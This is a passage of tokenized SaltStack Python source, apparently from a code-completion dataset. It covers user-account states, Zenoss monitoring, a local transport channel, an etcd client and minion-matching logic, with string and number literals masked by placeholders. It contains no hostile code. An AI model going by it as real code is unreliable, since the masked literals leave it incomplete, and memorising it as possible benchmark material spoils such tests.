'<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT:password>' ] = '<STR_LIT>' <EOL> if date : <EOL> __salt__ [ '<STR_LIT>' ] ( name , date ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != date : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . 
format ( name , date ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT:date>' ] = date <EOL> if mindays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , mindays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != mindays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , mindays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = mindays <EOL> if maxdays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , maxdays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != maxdays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , maxdays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = maxdays <EOL> if inactdays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , inactdays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != inactdays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , inactdays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = inactdays <EOL> if warndays : <EOL> __salt__ [ '<STR_LIT>' ] ( name , warndays ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != warndays : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , warndays ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = warndays <EOL> if expire : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if spost [ '<STR_LIT>' ] != expire : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , expire ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = expire <EOL> elif salt . utils . 
is_windows ( ) : <EOL> if password and not empty_password : <EOL> if not __salt__ [ '<STR_LIT>' ] ( name , password ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if expire : <EOL> __salt__ [ '<STR_LIT>' ] ( name , expire ) <EOL> spost = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if salt . utils . date_format ( spost [ '<STR_LIT>' ] ) != salt . utils . date_format ( expire ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , expire ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = spost [ '<STR_LIT>' ] <EOL> elif salt . utils . is_darwin ( ) and password and not empty_password : <EOL> if not __salt__ [ '<STR_LIT>' ] ( name , password ) : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' . format ( name , '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> def absent ( name , purge = False , force = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> lusr = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if lusr : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> beforegroups = set ( salt . utils . 
get_group_list ( name ) ) <EOL> ret [ '<STR_LIT:result>' ] = __salt__ [ '<STR_LIT>' ] ( name , purge , force ) <EOL> aftergroups = set ( [ g for g in beforegroups if __salt__ [ '<STR_LIT>' ] ( g ) ] ) <EOL> if ret [ '<STR_LIT:result>' ] : <EOL> ret [ '<STR_LIT>' ] = { } <EOL> for g in beforegroups - aftergroups : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' . format ( g ) ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] [ name ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return '<STR_LIT>' <EOL> def monitored ( name , device_class = None , collector = '<STR_LIT:localhost>' , prod_state = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> ret [ '<STR_LIT:name>' ] = name <EOL> device = __salt__ [ '<STR_LIT>' ] ( name ) <EOL> if device : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> if prod_state : <EOL> if device [ '<STR_LIT>' ] != prod_state : <EOL> __salt__ [ '<STR_LIT>' ] ( prod_state , name ) <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' . format ( device [ '<STR_LIT>' ] ) , '<STR_LIT>' : '<STR_LIT>' . format ( prod_state ) } <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> if __salt__ [ '<STR_LIT>' ] ( name , device_class , collector , prod_state ) : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
<s> from __future__ import absolute_import , print_function <EOL> import logging <EOL> import salt . utils <EOL> from salt . transport . client import ReqChannel <EOL> log = logging . getLogger ( __name__ ) <EOL> class LocalChannel ( ReqChannel ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , ** kwargs ) : <EOL> self . opts = opts <EOL> self . kwargs = kwargs <EOL> self . tries = <NUM_LIT:0> <EOL> def send ( self , load , tries = <NUM_LIT:3> , timeout = <NUM_LIT> ) : <EOL> if self . tries == <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) . format ( load ) <EOL> with salt . utils . fopen ( load [ '<STR_LIT:path>' ] ) as f : <EOL> ret = { <EOL> '<STR_LIT:data>' : '<STR_LIT>' . join ( f . readlines ( ) ) , <EOL> '<STR_LIT>' : load [ '<STR_LIT:path>' ] , <EOL> } <EOL> print ( '<STR_LIT>' , ret ) <EOL> else : <EOL> ret = { <EOL> '<STR_LIT:data>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> self . tries = self . tries + <NUM_LIT:1> <EOL> return ret <EOL> def crypted_transfer_decode_dictentry ( self , load , dictkey = None , tries = <NUM_LIT:3> , timeout = <NUM_LIT> ) : <EOL> super ( LocalChannel , self ) . crypted_transfer_decode_dictentry ( load , <EOL> dictkey = dictkey , <EOL> tries = tries , <EOL> timeout = timeout ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . exceptions import CommandExecutionError <EOL> try : <EOL> import etcd <EOL> from urllib3 . exceptions import ReadTimeoutError , MaxRetryError <EOL> HAS_LIBS = True <EOL> except ImportError : <EOL> HAS_LIBS = False <EOL> log = logging . getLogger ( __name__ ) <EOL> class EtcdUtilWatchTimeout ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class EtcdClient ( object ) : <EOL> def __init__ ( self , opts , profile = None ) : <EOL> opts_pillar = opts . get ( '<STR_LIT>' , { } ) <EOL> opts_master = opts_pillar . get ( '<STR_LIT>' , { } ) <EOL> opts_merged = { } <EOL> opts_merged . update ( opts_master ) <EOL> opts_merged . update ( opts_pillar ) <EOL> opts_merged . update ( opts ) <EOL> if profile : <EOL> self . conf = opts_merged . get ( profile , { } ) <EOL> else : <EOL> self . conf = opts_merged <EOL> host = self . conf . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> port = self . conf . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> username = self . conf . get ( '<STR_LIT>' ) <EOL> password = self . conf . get ( '<STR_LIT>' ) <EOL> auth = { } <EOL> if username and password : <EOL> auth = { <EOL> '<STR_LIT:username>' : str ( username ) , <EOL> '<STR_LIT:password>' : str ( password ) <EOL> } <EOL> if HAS_LIBS : <EOL> self . client = etcd . Client ( host , port , ** auth ) <EOL> else : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> def watch ( self , key , recurse = False , timeout = <NUM_LIT:0> , index = None ) : <EOL> ret = { <EOL> '<STR_LIT:key>' : key , <EOL> '<STR_LIT:value>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> result = self . read ( key , recursive = recurse , wait = True , timeout = timeout , waitIndex = index ) <EOL> except EtcdUtilWatchTimeout : <EOL> try : <EOL> result = self . read ( key ) <EOL> except etcd . 
EtcdKeyNotFound : <EOL> log . debug ( "<STR_LIT>" ) <EOL> return ret <EOL> except ValueError : <EOL> return { } <EOL> if result and getattr ( result , "<STR_LIT>" ) : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:value>' ] = getattr ( result , '<STR_LIT:value>' ) <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' ) <EOL> return ret <EOL> except ( etcd . EtcdConnectionFailed , MaxRetryError ) : <EOL> log . error ( "<STR_LIT>" . format ( key ) ) <EOL> return { } <EOL> except ValueError : <EOL> return { } <EOL> if recurse : <EOL> ret [ '<STR_LIT:key>' ] = getattr ( result , '<STR_LIT:key>' , None ) <EOL> ret [ '<STR_LIT:value>' ] = getattr ( result , '<STR_LIT:value>' , None ) <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' , None ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = getattr ( result , '<STR_LIT>' ) <EOL> return ret <EOL> def get ( self , key , recurse = False ) : <EOL> try : <EOL> result = self . read ( key , recursive = recurse ) <EOL> except etcd . EtcdKeyNotFound : <EOL> return None <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( key ) ) <EOL> return None <EOL> except ValueError : <EOL> return None <EOL> return getattr ( result , '<STR_LIT:value>' , None ) <EOL> def read ( self , key , recursive = False , wait = False , timeout = None , waitIndex = None ) : <EOL> try : <EOL> if waitIndex : <EOL> result = self . client . read ( key , recursive = recursive , wait = wait , timeout = timeout , waitIndex = waitIndex ) <EOL> else : <EOL> result = self . client . read ( key , recursive = recursive , wait = wait , timeout = timeout ) <EOL> except ( etcd . EtcdConnectionFailed , etcd . EtcdKeyNotFound ) as err : <EOL> log . error ( "<STR_LIT>" . format ( err ) ) <EOL> raise <EOL> except ReadTimeoutError : <EOL> if wait : <EOL> log . debug ( "<STR_LIT>" ) <EOL> raise EtcdUtilWatchTimeout ( "<STR_LIT>" . format ( key ) ) <EOL> log . error ( "<STR_LIT>" ) <EOL> raise etcd . 
EtcdConnectionFailed ( "<STR_LIT>" ) <EOL> except MaxRetryError as err : <EOL> log . error ( "<STR_LIT>" ) <EOL> raise etcd . EtcdConnectionFailed ( "<STR_LIT>" ) <EOL> except etcd . EtcdException as err : <EOL> log . error ( "<STR_LIT>" . format ( err ) ) <EOL> raise <EOL> except ValueError : <EOL> log . error ( "<STR_LIT>" ) <EOL> raise <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise <EOL> return result <EOL> def _flatten ( self , data , path = '<STR_LIT>' ) : <EOL> if len ( data . keys ( ) ) == <NUM_LIT:0> : <EOL> return { path : { } } <EOL> path = path . strip ( '<STR_LIT:/>' ) <EOL> flat = { } <EOL> for k , v in data . iteritems ( ) : <EOL> k = k . strip ( '<STR_LIT:/>' ) <EOL> if path : <EOL> p = '<STR_LIT>' . format ( path , k ) <EOL> else : <EOL> p = '<STR_LIT>' . format ( k ) <EOL> if isinstance ( v , dict ) : <EOL> ret = self . _flatten ( v , p ) <EOL> flat . update ( ret ) <EOL> else : <EOL> flat [ p ] = v <EOL> return flat <EOL> def update ( self , fields , path = '<STR_LIT>' ) : <EOL> if not isinstance ( fields , dict ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> return None <EOL> fields = self . _flatten ( fields , path ) <EOL> keys = { } <EOL> for k , v in fields . iteritems ( ) : <EOL> is_dir = False <EOL> if isinstance ( v , dict ) : <EOL> is_dir = True <EOL> keys [ k ] = self . write ( k , v , directory = is_dir ) <EOL> return keys <EOL> def set ( self , key , value , ttl = None , directory = False ) : <EOL> return self . write ( key , value , ttl = ttl , directory = directory ) <EOL> def write ( self , key , value , ttl = None , directory = False ) : <EOL> if directory : <EOL> value = None <EOL> try : <EOL> result = self . client . write ( key , value , ttl = ttl , dir = directory ) <EOL> except ( etcd . EtcdNotFile , etcd . EtcdNotDir , etcd . EtcdRootReadOnly , ValueError ) as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except MaxRetryError as err : <EOL> log . 
error ( "<STR_LIT>" . format ( err ) ) <EOL> return None <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise <EOL> if directory : <EOL> return getattr ( result , '<STR_LIT>' ) <EOL> else : <EOL> return getattr ( result , '<STR_LIT:value>' ) <EOL> def ls ( self , path ) : <EOL> ret = { } <EOL> try : <EOL> items = self . read ( path ) <EOL> except ( etcd . EtcdKeyNotFound , ValueError ) : <EOL> return { } <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( path ) ) <EOL> return None <EOL> for item in items . children : <EOL> if item . dir is True : <EOL> if item . key == path : <EOL> continue <EOL> dir_name = '<STR_LIT>' . format ( item . key ) <EOL> ret [ dir_name ] = { } <EOL> else : <EOL> ret [ item . key ] = item . value <EOL> return { path : ret } <EOL> def rm ( self , key , recurse = False ) : <EOL> return self . delete ( key , recurse ) <EOL> def delete ( self , key , recursive = False ) : <EOL> try : <EOL> if self . client . delete ( key , recursive = recursive ) : <EOL> return True <EOL> else : <EOL> return False <EOL> except ( etcd . EtcdNotFile , etcd . EtcdRootReadOnly , etcd . EtcdDirNotEmpty , etcd . EtcdKeyNotFound , ValueError ) as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except MaxRetryError as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> return None <EOL> except Exception as err : <EOL> log . error ( '<STR_LIT>' . format ( err ) ) <EOL> raise <EOL> def tree ( self , path ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> try : <EOL> items = self . read ( path ) <EOL> except ( etcd . EtcdKeyNotFound , ValueError ) : <EOL> return None <EOL> except etcd . EtcdConnectionFailed : <EOL> log . error ( "<STR_LIT>" . format ( path ) ) <EOL> return None <EOL> for item in items . children : <EOL> comps = str ( item . key ) . split ( '<STR_LIT:/>' ) <EOL> if item . dir is True : <EOL> if item . 
key == path : <EOL> continue <EOL> ret [ comps [ - <NUM_LIT:1> ] ] = self . tree ( item . key ) <EOL> else : <EOL> ret [ comps [ - <NUM_LIT:1> ] ] = item . value <EOL> return ret <EOL> def get_conn ( opts , profile = None ) : <EOL> client = EtcdClient ( opts , profile ) <EOL> return client <EOL> def tree ( client , path ) : <EOL> return client . tree ( path ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import fnmatch <EOL> import re <EOL> import logging <EOL> import salt . payload <EOL> import salt . utils <EOL> from salt . defaults import DEFAULT_TARGET_DELIM <EOL> from salt . exceptions import CommandExecutionError <EOL> import salt . auth . ldap <EOL> import salt . ext . six as six <EOL> import salt . ext . six as six <EOL> if six . PY3 : <EOL> import ipaddress <EOL> else : <EOL> import salt . ext . ipaddress as ipaddress <EOL> HAS_RANGE = False <EOL> try : <EOL> import seco . range <EOL> HAS_RANGE = True <EOL> except ImportError : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> TARGET_REX = re . compile ( <EOL> r'''<STR_LIT>''' <EOL> ) <EOL> def parse_target ( target_expression ) : <EOL> '''<STR_LIT>''' <EOL> match = TARGET_REX . match ( target_expression ) <EOL> if not match : <EOL> log . warning ( '<STR_LIT>' . format ( target_expression ) ) <EOL> ret = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : target_expression , <EOL> } <EOL> else : <EOL> ret = match . groupdict ( ) <EOL> return ret <EOL> def get_minion_data ( minion , opts ) : <EOL> '''<STR_LIT>''' <EOL> if opts . get ( '<STR_LIT>' , False ) : <EOL> serial = salt . payload . Serial ( opts ) <EOL> cdir = os . path . join ( opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return minion if minion else None , None , None <EOL> minions = os . listdir ( cdir ) <EOL> if minion is None : <EOL> for id_ in minions : <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> miniondata = serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> continue <EOL> grains = miniondata . get ( '<STR_LIT>' ) <EOL> pillar = miniondata . get ( '<STR_LIT>' ) <EOL> return id_ , grains , pillar <EOL> else : <EOL> datap = os . path . 
join ( cdir , minion , '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> miniondata = serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> return minion , None , None <EOL> grains = miniondata . get ( '<STR_LIT>' ) <EOL> pillar = miniondata . get ( '<STR_LIT>' ) <EOL> return minion , grains , pillar <EOL> return minion if minion else None , None , None <EOL> def nodegroup_comp ( nodegroup , nodegroups , skip = None , first_call = True ) : <EOL> '''<STR_LIT>''' <EOL> expanded_nodegroup = False <EOL> if skip is None : <EOL> skip = set ( ) <EOL> elif nodegroup in skip : <EOL> log . error ( '<STR_LIT>' . format ( nodegroup ) ) <EOL> return '<STR_LIT>' <EOL> if nodegroup not in nodegroups : <EOL> log . error ( '<STR_LIT>' . format ( nodegroup ) ) <EOL> return '<STR_LIT>' <EOL> nglookup = nodegroups [ nodegroup ] <EOL> if isinstance ( nglookup , six . string_types ) : <EOL> words = nglookup . split ( ) <EOL> elif isinstance ( nglookup , ( list , tuple ) ) : <EOL> words = nglookup <EOL> else : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( nodegroup , nglookup ) <EOL> ) <EOL> return '<STR_LIT>' <EOL> skip . add ( nodegroup ) <EOL> ret = [ ] <EOL> opers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:(>' , '<STR_LIT:)>' ] <EOL> for word in words : <EOL> if word in opers : <EOL> ret . append ( word ) <EOL> elif len ( word ) >= <NUM_LIT:3> and word . startswith ( '<STR_LIT>' ) : <EOL> expanded_nodegroup = True <EOL> ret . extend ( nodegroup_comp ( word [ <NUM_LIT:2> : ] , nodegroups , skip = skip , first_call = False ) ) <EOL> else : <EOL> ret . append ( word ) <EOL> if ret : <EOL> ret . insert ( <NUM_LIT:0> , '<STR_LIT:(>' ) <EOL> ret . append ( '<STR_LIT:)>' ) <EOL> skip . remove ( nodegroup ) <EOL> log . debug ( '<STR_LIT>' . format ( nodegroup , ret ) ) <EOL> if expanded_nodegroup or not first_call : <EOL> return ret <EOL> else : <EOL> log . 
debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( nodegroups [ nodegroup ] ) ) <EOL> return nodegroups [ nodegroup ] <EOL> class CkMinions ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> self . serial = salt . payload . Serial ( opts ) <EOL> if self . opts . get ( '<STR_LIT>' , '<STR_LIT>' ) in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . acc = '<STR_LIT>' <EOL> else : <EOL> self . acc = '<STR_LIT>' <EOL> def _check_glob_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> pki_dir = os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) <EOL> try : <EOL> files = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( pki_dir ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( pki_dir , fn_ ) ) : <EOL> files . append ( fn_ ) <EOL> return fnmatch . filter ( files , expr ) <EOL> except OSError : <EOL> return [ ] <EOL> def _check_list_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( expr , six . string_types ) : <EOL> expr = [ m for m in expr . split ( '<STR_LIT:U+002C>' ) if m ] <EOL> ret = [ ] <EOL> for minion in expr : <EOL> if os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , minion ) ) : <EOL> ret . append ( minion ) <EOL> return ret <EOL> def _check_pcre_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> minions = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> minions . append ( fn_ ) <EOL> reg = re . compile ( expr ) <EOL> return [ m for m in minions if reg . 
match ( m ) ] <EOL> except OSError : <EOL> return [ ] <EOL> def _check_cache_minions ( self , <EOL> expr , <EOL> delimiter , <EOL> greedy , <EOL> search_type , <EOL> regex_match = False , <EOL> exact_match = False ) : <EOL> '''<STR_LIT>''' <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> elif cache_enabled : <EOL> minions = os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return list ( ) <EOL> if cache_enabled : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return list ( minions ) <EOL> for id_ in os . listdir ( cdir ) : <EOL> if not greedy and id_ not in minions : <EOL> continue <EOL> datap = os . path . join ( cdir , id_ , '<STR_LIT>' ) <EOL> if not os . path . isfile ( datap ) : <EOL> if not greedy and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> continue <EOL> search_results = self . serial . load ( <EOL> salt . utils . fopen ( datap , '<STR_LIT:rb>' ) <EOL> ) . get ( search_type ) <EOL> if not salt . utils . subdict_match ( search_results , <EOL> expr , <EOL> delimiter = delimiter , <EOL> regex_match = regex_match , <EOL> exact_match = exact_match ) and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> return list ( minions ) <EOL> def _check_grain_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , delimiter , greedy , '<STR_LIT>' ) <EOL> def _check_grain_pcre_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . 
_check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> regex_match = True ) <EOL> def _check_pillar_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , delimiter , greedy , '<STR_LIT>' ) <EOL> def _check_pillar_pcre_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> regex_match = True ) <EOL> def _check_pillar_exact_minions ( self , expr , delimiter , greedy ) : <EOL> '''<STR_LIT>''' <EOL> return self . _check_cache_minions ( expr , <EOL> delimiter , <EOL> greedy , <EOL> '<STR_LIT>' , <EOL> exact_match = True ) <EOL> def _check_ipcidr_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc ) ) ) : <EOL> if not fn_ . startswith ( '<STR_LIT:.>' ) and os . path . isfile ( os . path . join ( self . opts [ '<STR_LIT>' ] , self . acc , fn_ ) ) : <EOL> mlist . append ( fn_ ) <EOL> minions = set ( mlist ) <EOL> elif cache_enabled : <EOL> minions = os . listdir ( os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) ) <EOL> else : <EOL> return [ ] <EOL> if cache_enabled : <EOL> cdir = os . path . join ( self . opts [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if not os . path . isdir ( cdir ) : <EOL> return list ( minions ) <EOL> tgt = expr <EOL> try : <EOL> tgt = ipaddress . ip_address ( tgt ) <EOL> except : <EOL> try : <EOL> tgt = ipaddress . ip_network ( tgt ) <EOL> except : <EOL> log . error ( '<STR_LIT>' . format ( tgt ) ) <EOL> return [ ] <EOL> proto = '<STR_LIT>' . format ( tgt . version ) <EOL> for id_ in os . listdir ( cdir ) : <EOL> if not greedy and id_ not in minions : <EOL> continue <EOL> datap = os . path . 
join ( cdir , id_ , '<STR_LIT>' ) <EOL> if not os . path . isfile ( datap ) : <EOL> if not greedy and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> continue <EOL> try : <EOL> with salt . utils . fopen ( datap , '<STR_LIT:rb>' ) as fp_ : <EOL> grains = self . serial . load ( fp_ ) . get ( '<STR_LIT>' ) <EOL> except ( IOError , OSError ) : <EOL> continue <EOL> if proto not in grains : <EOL> match = False <EOL> elif isinstance ( tgt , ( ipaddress . IPv4Address , ipaddress . IPv6Address ) ) : <EOL> match = str ( tgt ) in grains [ proto ] <EOL> else : <EOL> match = salt . utils . network . in_subnet ( tgt , grains [ proto ] ) <EOL> if not match and id_ in minions : <EOL> minions . remove ( id_ ) <EOL> return list ( minions ) <EOL> def _check_range_minions ( self , expr , greedy ) : <EOL> '''<STR_LIT>''' <EOL> if not HAS_RANGE : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _range = seco . range . Range ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> return self . _range . expand ( expr ) <EOL> except seco . range . RangeException as exc : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( exc ) <EOL> ) <EOL> cache_enabled = self . opts . get ( '<STR_LIT>' , False ) <EOL> if greedy : <EOL> mlist = [ ] <EOL> for fn_ in salt . utils . isorted ( os . listdir ( os . path . join ( self . 